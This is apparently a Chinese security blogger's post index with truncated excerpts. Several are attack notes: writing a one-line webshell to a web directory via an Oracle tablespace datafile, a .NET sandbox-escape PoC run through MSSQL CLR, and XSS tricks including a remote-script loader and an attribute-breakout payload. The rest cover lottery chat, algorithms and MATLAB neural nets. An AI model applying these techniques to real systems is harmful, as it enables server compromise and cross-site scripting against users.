摘要： author: kj021320转载请注明出处 其实 类似ORACLE 这样强大的数据库，真没必要用到这么土的办法SQLJ存储过程写文件也可以，逼于无奈对方机器不支持SQLJ 还有 UTL_FILE包也被干掉了？那 也可以 使用以下我说的这个方式SQL> create tablespace kjtest datafile 'e:/website/kj.asp' size 100k nologging ;表空间已创建。这里记住了 100K为ORACLE 表空间最小的单位，如果你的一句话SHELL比较大 那可以200K比较稳妥但是最终建议一句话一定要最最简洁SQL> C 阅读全文

摘要： 原理具体可以 去看看关于 <<Writinga.NETSecurityExploitPoC>> 一文里面主要采用了 .NET 的两个union 类型转换,然后把代码写到 委托里面直接call 那个委托就以asm 代码执行了你写的code最后绕过了 安全沙盒作者还给了POChttp://www.frijters.net/TypeSafetyExploitPoC.cs.txt后来跟 云舒 刺 几个在那里搞啊搞啊~~回家后测试MSSQL2005 调用 CLR的过程MSSQL2005 可以执行 .NET DLL程序集执行是没有权限限制的但是 建立一个 .NET DLL程序集是 阅读全文

摘要： 说也无聊，某天某个不懂计算机的朋友恳求我帮忙做一个随机出号码的程序，说是要让计算机预计下期的福利彩票无语了... 随便把这个奇闻扔到群内吹水吹水kj 21:21:55刚才有个朋友叫我帮他用程序写一个 福利彩票的kj 21:22:01估计 人想发财想得没办法了就会想这些的rebeyond 21:22:12写什么福利彩票的？rebeyond 21:22:14钓鱼的？amxsa 21:22:23 随机 取号码?kj(282720807) 21:22:29他打算用计算机来 预测彩票...kj(282720807) 21:22:36是的 随机 取号码rebeyond 21:22:40汗啊amxsa 21 阅读全文

摘要： 测试了IE 不成功TMD~~~，FF可以！import.jsp<%response.addHeader("Link", "<http://ip:8080/myweb/xss.css> ; REL=stylesheet") ;%><!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"><HTML><HEAD><TITLE> xss </TITLE></HEAD><BOD 阅读全文

摘要： 算法的力量 算法是计算机科学领域最重要的基石之一，但却受到了国内一些程序员的冷落。许多学生看到一些公司在招聘时要求的编程语言五花八门，就产生了一种误解，认为学计算机就是学各种编程语言，或者认为，学习最新的语言、技术、标准就是最好的铺路方法。其实，大家被这些公司误导了。编程语言虽然该学，但是学习计算机算法和理论更重要，因为计算机语言和开发平台日新月异，但万变不离其宗的是那些算法和理论，例如数据结构、算法、编译原理、计算机体系结构、关系型数据库原理等等。在“开复学生网”上，有位同学生动地把这些基础课程比拟为“内功”，把新的语言、技术、标准比拟为“外功”。整天赶时髦的人最后只懂得招式，没有功力，是不 阅读全文

摘要： 今天跟AMXSA在弄一个XSS的时候就讨论到，字符长度限制了70个，该XSS是出现在<img src="xsscode"> ， 后来他说对方过滤了 < > " ' 这样 只能有限的调用。开始我建议他 多弄几个 <img 然后 代码分别写在不同的 src= 中 这样间接的把代码连贯起来。后来他尝试了发现不可以对方处理 <img 头像的时候只有一个攻击点，郁闷了！ 想想平时我们XSS导入一个远程的JS就是为了执行更多的代码，更方便。 1.window.k=document.createElement('Script& 阅读全文

摘要： 某网站存在一个 storeXSS 利用点如下<input type=text value="[xsscode]">可以使用 双引号绕过去属性限制，但是不能采用 < > 比较郁闷开始打算 "style="kj:expression(EXP)<input type=text value=""style="kj:expression(EXP)">后来查了查资料！发现expression是IE 才能使用的！郁闷了！而且要XSS的对象是老外 ，不一定会采用IE ，这样跨站攻击起来了，但是效 阅读全文

摘要： 之前 写了一个 NN的测试代码,后来想想发现好象 逼近得不相似,改了一下测试数据!就像你人一样! 因为过去有经历,所以会在经历中找寻类似的,但是 如果你过去没经历,那就没办法预测close all;clear;clc;x = -10:0.03:9.99;y = -9.99 : 0.03 : 10;sinx = sin(x);siny = sin(y);for i=2:5 %x input %sinx target kjnet=newrbe(x,sinx,i); %使用 newrbe算法进行 NN训练，i可选择(径向基函数扩展速度)，具体可以查看API中的exampleend... 阅读全文

摘要： 神经网络学习笔记 ...close all;clear;clc;y=-10:0.01:9.99; %从-10到9.99每次递增0.01 取 2000个数据yn=sin(y); %把 y 中 2000个数据全部进行 sin 运算p=y(1:800); %从 y矩阵中取 1~800个数据t=yn(1:800); %从yn 中取 1~800个数据o1=y(801:1600); %不多说了 取 801~1600个数据 (作为训练后的神经网络使用)o2=yn(801:1600); %801~1600个数据，真正的 sin 运算结果for i=2:5 net=newrbe(p,t,i); %... 阅读全文

摘要： 哈哈， 中间最会摆 造型的就是我啦~~~ 左1 的是 SUDDY 左2就是传说中的刺头了 我的右边 是LARRY 角落了里面(右1) 就是 大家所说的 云舒MM了 美女哇！ 哈哈！ 阅读全文